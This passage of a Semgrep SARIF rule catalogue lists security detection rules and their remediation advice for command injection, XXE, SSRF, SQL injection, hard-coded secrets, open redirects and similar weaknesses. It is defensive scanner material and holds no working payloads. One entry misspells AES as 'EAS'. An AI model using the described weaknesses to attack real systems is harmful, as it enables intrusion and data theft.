yaml.github-actions.security.github-script-injection.github-script-injection"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Auditing is not enabled for DocumentDB. To ensure that you are able to accurately audit the usage of your DocumentDB cluster, you should enable auditing and export logs to CloudWatch."},"help":{"markdown":"Auditing is not enabled for DocumentDB. To ensure that you are able to accurately audit the usage of your DocumentDB cluster, you should enable auditing and export logs to CloudWatch.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/docdb_cluster#enabled_cloudwatch_logs_exports](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/docdb_cluster#enabled_cloudwatch_logs_exports)\n - [https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/)\n","text":"Auditing is not enabled for DocumentDB. To ensure that you are able to accurately audit the usage of your DocumentDB cluster, you should enable auditing and export logs to CloudWatch."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled","id":"terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled","name":"terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled","properties":{"precision":"very-high","tags":["CWE-778: Insufficient Logging","MEDIUM CONFIDENCE","OWASP-A09:2021 - Security Logging and Monitoring Failures","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret","id":"java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret","name":"java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found a formatted template string passed to 'template.HTML()'. 'template.HTML()' does not escape contents. Be absolutely sure there is no user-controlled data in this template. If user data can reach this template, you may have a XSS vulnerability."},"help":{"markdown":"Found a formatted template string passed to 'template.HTML()'. 'template.HTML()' does not escape contents. Be absolutely sure there is no user-controlled data in this template. If user data can reach this template, you may have a XSS vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.formatted-template-string.formatted-template-string)\n - [https://golang.org/pkg/html/template/#HTML](https://golang.org/pkg/html/template/#HTML)\n","text":"Found a formatted template string passed to 'template.HTML()'. 'template.HTML()' does not escape contents. Be absolutely sure there is no user-controlled data in this template. If user data can reach this template, you may have a XSS vulnerability."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.formatted-template-string.formatted-template-string","id":"go.lang.security.audit.net.formatted-template-string.formatted-template-string","name":"go.lang.security.audit.net.formatted-template-string.formatted-template-string","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.formatted-template-string.formatted-template-string"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array","id":"python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array","name":"python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks through parameter entities by configuring $FACTORY with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks through parameter entities by configuring $FACTORY with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks through parameter entities by configuring $FACTORY with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities","id":"java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities","name":"java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"AWS Session Token detected"},"help":{"markdown":"AWS Session Token detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-aws-session-token.detected-aws-session-token)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"AWS Session Token detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-aws-session-token.detected-aws-session-token","id":"generic.secrets.security.detected-aws-session-token.detected-aws-session-token","name":"generic.secrets.security.detected-aws-session-token.detected-aws-session-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-aws-session-token.detected-aws-session-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"IDEA (International Data Encryption Algorithm) is a block cipher created in 1991. It is an optional component of the OpenPGP standard. This cipher is susceptible to attacks when using weak keys. It is recommended that you do not use this cipher for new applications. Use a strong symmetric cipher such as EAS instead. With the `cryptography` package it is recommended to use `Fernet` which is a secure implementation of AES in CBC mode with a 128-bit key. Alternatively, keep using the `Cipher` class from the hazmat primitives but use the AES algorithm instead."},"help":{"markdown":"IDEA (International Data Encryption Algorithm) is a block cipher created in 1991. It is an optional component of the OpenPGP standard. This cipher is susceptible to attacks when using weak keys. It is recommended that you do not use this cipher for new applications. Use a strong symmetric cipher such as EAS instead. With the `cryptography` package it is recommended to use `Fernet` which is a secure implementation of AES in CBC mode with a 128-bit key. Alternatively, keep using the `Cipher` class from the hazmat primitives but use the AES algorithm instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea)\n - [https://tools.ietf.org/html/rfc5469](https://tools.ietf.org/html/rfc5469)\n - [https://cryptography.io/en/latest/hazmat/primitives/symmetric-encryption/#cryptography.hazmat.primitives.ciphers.algorithms.IDEA](https://cryptography.io/en/latest/hazmat/primitives/symmetric-encryption/#cryptography.hazmat.primitives.ciphers.algorithms.IDEA)\n","text":"IDEA (International Data Encryption Algorithm) is a block cipher created in 1991. It is an optional component of the OpenPGP standard. This cipher is susceptible to attacks when using weak keys. It is recommended that you do not use this cipher for new applications. Use a strong symmetric cipher such as EAS instead. With the `cryptography` package it is recommended to use `Fernet` which is a secure implementation of AES in CBC mode with a 128-bit key. Alternatively, keep using the `Cipher` class from the hazmat primitives but use the AES algorithm instead."},"helpUri":"https://semgrep.dev/r/python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea","id":"python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea","name":"python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing","id":"python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing","name":"python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.mysql.mysql-empty-password.mysql-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.mysql.mysql-empty-password.mysql-empty-password","id":"go.secrets.mysql.mysql-empty-password.mysql-empty-password","name":"go.secrets.mysql.mysql-empty-password.mysql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.mysql.mysql-empty-password.mysql-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"This expression points to memory that has been freed. This can lead to a segmentation fault or memory corruption."},"help":{"markdown":"This expression points to memory that has been freed. This can lead to a segmentation fault or memory corruption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete)\n - [https://wiki.sei.cmu.edu/confluence/display/c/MEM30-C.+Do+not+access+freed+memory](https://wiki.sei.cmu.edu/confluence/display/c/MEM30-C.+Do+not+access+freed+memory)\n - [https://wiki.sei.cmu.edu/confluence/display/cplusplus/EXP54-CPP.+Do+not+access+an+object+outside+of+its+lifetime](https://wiki.sei.cmu.edu/confluence/display/cplusplus/EXP54-CPP.+Do+not+access+an+object+outside+of+its+lifetime)\n","text":"This expression points to memory that has been freed. This can lead to a segmentation fault or memory corruption."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete","id":"cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete","name":"cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete","properties":{"precision":"very-high","tags":["CWE-416: Use After Free","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this."},"help":{"markdown":"`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy)\n - [https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services#configuring-the-role-and-trust-policy](https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services#configuring-the-role-and-trust-policy)\n - [https://dagrz.com/writing/aws-security/hacking-github-aws-oidc/](https://dagrz.com/writing/aws-security/hacking-github-aws-oidc/)\n","text":"`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy","id":"terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy","name":"terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application builds a URL using user-controlled input which can lead to an open redirect vulnerability. An attacker can manipulate the URL and redirect users to an arbitrary domain. Open redirect vulnerabilities can lead to issues such as Cross-site scripting (XSS) or redirecting to a malicious domain for activities such as phishing to capture users' credentials. To prevent this vulnerability perform strict input validation of the domain against an allowlist of approved domains. Notify a user in your application that they are leaving the website. Display a domain where they are redirected to the user. A user can then either accept or deny the redirect to an untrusted site."},"help":{"markdown":"The application builds a URL using user-controlled input which can lead to an open redirect vulnerability. An attacker can manipulate the URL and redirect users to an arbitrary domain. Open redirect vulnerabilities can lead to issues such as Cross-site scripting (XSS) or redirecting to a malicious domain for activities such as phishing to capture users' credentials. To prevent this vulnerability perform strict input validation of the domain against an allowlist of approved domains. Notify a user in your application that they are leaving the website. Display a domain where they are redirected to the user. A user can then either accept or deny the redirect to an untrusted site.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.open-redirect-pathname.open-redirect-pathname)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html)\n","text":"The application builds a URL using user-controlled input which can lead to an open redirect vulnerability. An attacker can manipulate the URL and redirect users to an arbitrary domain. Open redirect vulnerabilities can lead to issues such as Cross-site scripting (XSS) or redirecting to a malicious domain for activities such as phishing to capture users' credentials. To prevent this vulnerability perform strict input validation of the domain against an allowlist of approved domains. Notify a user in your application that they are leaving the website. Display a domain where they are redirected to the user. A user can then either accept or deny the redirect to an untrusted site."},"helpUri":"https://semgrep.dev/r/javascript.browser.open-redirect-pathname.open-redirect-pathname","id":"javascript.browser.open-redirect-pathname.open-redirect-pathname","name":"javascript.browser.open-redirect-pathname.open-redirect-pathname","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.open-redirect-pathname.open-redirect-pathname"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A parameter being passed directly into `url` most likely lead to SSRF. This could allow an attacker to send data to their own server, potentially exposing sensitive data sent with this request. They could also probe internal servers or other resources that the server running this code can access. Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"help":{"markdown":"A parameter being passed directly into `url` most likely lead to SSRF. This could allow an attacker to send data to their own server, potentially exposing sensitive data sent with this request. They could also probe internal servers or other resources that the server running this code can access. Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n - [https://dispatchhttp.org/Dispatch.html](https://dispatchhttp.org/Dispatch.html)\n","text":"A parameter being passed directly into `url` most likely lead to SSRF. This could allow an attacker to send data to their own server, potentially exposing sensitive data sent with this request. They could also probe internal servers or other resources that the server running this code can access. Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"helpUri":"https://semgrep.dev/r/scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf","id":"scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf","name":"scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"help":{"markdown":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.aws-lambda.security.tainted-sql-string.tainted-sql-string)\n - [https://owasp.org/www-community/attacks/SQL_Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n","text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"helpUri":"https://semgrep.dev/r/java.aws-lambda.security.tainted-sql-string.tainted-sql-string","id":"java.aws-lambda.security.tainted-sql-string.tainted-sql-string","name":"java.aws-lambda.security.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.aws-lambda.security.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is running debug code or has debug mode enabled. This may expose sensitive information, like stack traces and environment variables, to attackers. It may also modify application behavior, potentially enabling attackers to bypass restrictions. To remediate this finding, ensure that the application's debug code and debug mode are disabled or removed from the production environment."},"help":{"markdown":"The application is running debug code or has debug mode enabled. This may expose sensitive information, like stack traces and environment variables, to attackers. It may also modify application behavior, potentially enabling attackers to bypass restrictions. To remediate this finding, ensure that the application's debug code and debug mode are disabled or removed from the production environment.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors)\n - [https://flask.palletsprojects.com/en/3.0.x/debugging/](https://flask.palletsprojects.com/en/3.0.x/debugging/)\n","text":"The application is running debug code or has debug mode enabled. This may expose sensitive information, like stack traces and environment variables, to attackers. It may also modify application behavior, potentially enabling attackers to bypass restrictions. To remediate this finding, ensure that the application's debug code and debug mode are disabled or removed from the production environment."},"helpUri":"https://semgrep.dev/r/python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors","id":"python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors","name":"python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors","properties":{"precision":"very-high","tags":["CWE-489: Active Debug Code","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.debug.debug-flask-passthrough-errors.debug-flask-passthrough-errors"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Avoid using insecure deserialization library, backed by `pickle`, `_pickle`, `cpickle`, `dill`, `shelve`, or `yaml`, which are known to lead to remote code execution vulnerabilities."},"help":{"markdown":"Avoid using insecure deserialization library, backed by `pickle`, `_pickle`, `cpickle`, `dill`, `shelve`, or `yaml`, which are known to lead to remote code execution vulnerabilities.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.avoid-insecure-deserialization.avoid-insecure-deserialization)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n","text":"Avoid using insecure deserialization library, backed by `pickle`, `_pickle`, `cpickle`, `dill`, `shelve`, or `yaml`, which are known to lead to remote code execution 